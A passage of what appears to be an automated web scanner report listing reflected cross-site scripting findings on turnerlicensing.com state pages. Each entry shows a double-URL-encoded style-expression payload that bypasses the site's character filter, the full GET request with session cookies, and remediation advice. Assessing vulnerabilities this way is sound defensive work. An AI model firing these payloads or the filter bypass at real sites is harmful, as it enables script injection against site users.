Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.110. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-Mexico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.111. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/New-York
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.112. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/North-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.113. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/North-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.114. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Ohio
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.115. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Oklahoma
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.116. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Oregon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.117. http://www.turnerlicensing.com/teams_by_state/Ottawa [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Ottawa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 885e7'style='x:expression(alert(1))'749e6052f63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.118. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.119. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Rhode-Island
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.120. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/South-Carolina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.121. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/South-Dakota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.122. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Tennessee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.123. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Texas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.124. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Toronto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3d65'style='x:expression(alert(1))'87f866157d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Toronto?f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
